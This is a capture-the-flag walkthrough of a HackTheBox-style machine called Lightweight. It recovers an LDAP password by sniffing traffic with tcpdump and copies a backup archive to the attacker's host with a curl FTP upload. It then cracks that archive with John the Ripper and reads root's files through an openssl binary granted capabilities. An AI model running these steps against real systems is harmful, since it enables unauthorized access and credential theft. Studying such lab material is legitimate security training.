We begin with a standard nmap scan:
root@orbital:~# nmap -A -T4 -oN lightweight_scan 10.10.10.119
And we can see it is running a few services:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16) 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
The LDAP (Lightweight Directory Access Protocol) service will surely be useful at some point, but for now, if we have a look at the HTTP server, we’ll find the following in the user page:
This server lets you get in with ssh. Your IP is automatically added as userid and password within a minute of your first http page request. We strongly suggest you to change your password as soon as you get in the box.
For the initial probe I’ve used the Linux Smart Enumeration script, which I prefer to other enumeration scripts. The ability to generate logs at different levels of detail is a great way to methodically dig into the machine. Since we do have an account and SSH access from the very start, we just copy files around with scp.
LSE identified two other users, which given the names will interact with the LDAP service:
- ldapuser1
- ldapuser2
More interestingly, however, it highlights that we can sniff traffic with tcpdump. So let us listen:
ip@lightweight:~$ tcpdump -i 5 -vvv -XX
While listening to the TCP dump, if we navigate to the “banned users” page, we will get an interesting package:
lightweight.htb.56908 > lightweight.htb.ldap: Flags [P.], cksum 0x2983 (incorrect -> 0xd5e5), seq 1:92, ack 1, win 683, options [nop,nop,TS val 232812292 ecr 232812292], length 91
0x0000: 0000 0000 0000 0000 0000 0000 0800 4500 ..............E.
0x0010: 008f 51f8 4000 4006 bf6f 0a0a 0a77 0a0a ..Q.@.@..o...w..
0x0020: 0a77 de4c 0185 a667 3ef3 08ce 5448 8018 .w.L...g>...TH..
0x0030: 02ab 2983 0000 0101 080a 0de0 6f04 0de0 ..).........o...
0x0040: 6f04 3059 0201 0160 5402 0103 042d 7569 o.0Y...`T....-ui
0x0050: 643d 6c64 6170 7573 6572 322c 6f75 3d50 d=ldapuser2,ou=P
0x0060: 656f 706c 652c 6463 3d6c 6967 6874 7765 eople,dc=lightwe
0x0070: 6967 6874 2c64 633d 6874 6280 2038 6263 ight,dc=htb..8bc
0x0080: 3832 3531 3333 3261 6265 3164 3766 3130 8251332abe1d7f10
0x0090: 3564 3365 3533 6164 3339 6163 32 5d3e53ad39ac2
So we’re intercepting some LDAP traffic. LDAP supports different authentication methods, but since we can actually read this data, it looks like it is configured to use Simple Authentication. This type of authentication sends the DN and the password in plain text across the network.
DN: uid=ldapuser2,ou=People,dc=lightweight,dc=htb Password: 8bc8251332abe1d7f105d3e53ad39ac2
We can’t SSH into ldapuser2, but if we connect with our initial user, we can then su - ldap2user and use the password we have just recovered.
The user flag is present in this user’s home folder, as well as the following files:
- backup.7z
- OpenLDAP-Admin-Guide.pdf
- OpenLdap.pdf
netcat isn’t present on our target, but we have curl so we can do a FTP upload. On my host I installed pyftpdlib, which allows spooling up a minimal FTP server at a particular folder with no additional setup:
root@orbital:~# pip install --user pyftpdlib
Then ran:
root@orbital:~# python -m pyftpdlib --directory=. --port=2121 --write
And on lightweight:
ldapuser2@lightweight:~$ curl -k -T backup.7z ftp://10.10.14.13:2121
The backup file is password protected and contains the PHP source for the website. Might contain additional credentials?
JohnTheRipper should be able to do this.
I had to install the jumbo-bleeding version of JTR, as the pre-installed JTR can’t deal with the 7z file. With it installed, however, we can extract the hash with 7z2john.pl:
root@orbital:~# ./7z2john.pl backup.7z > backup.7z.hash
And then ran John against the hash, using the default password list:
root@orbital:~# john --wordlist=password.lst backup.7z.hash
John will quickly show us that the password for the file is delete. We can then extract the files and we quickly find credentials for ldapuser1 in status.php:
$username = 'ldapuser1'; $password = 'f3ca9d298a553da117442deeb6fa932d';
We then switch to this user with su - ldapuser1.
Although none of the files have any interesting permissions set, they have something else of interest: capabilities. We can get the capabilities of all files in the machine by doing:
ldapuser1@lightweight:~$ getcap -r / 2>/dev/null
From this we find that the copy of openssl in /home/ldapuser1 appears to have all the capabilities enabled. This would include reading files from /root. Now, openssl of all things isn’t exactly cat, but it can encode files in various formats and print them out. So, we ask it to encode /root/root.txt in base64 and immediately decode the output afterwards!
ldapuser1@lightweight:~$ ./openssl base64 -in /root/root.txt | base64 -d
And the root flag is ours.
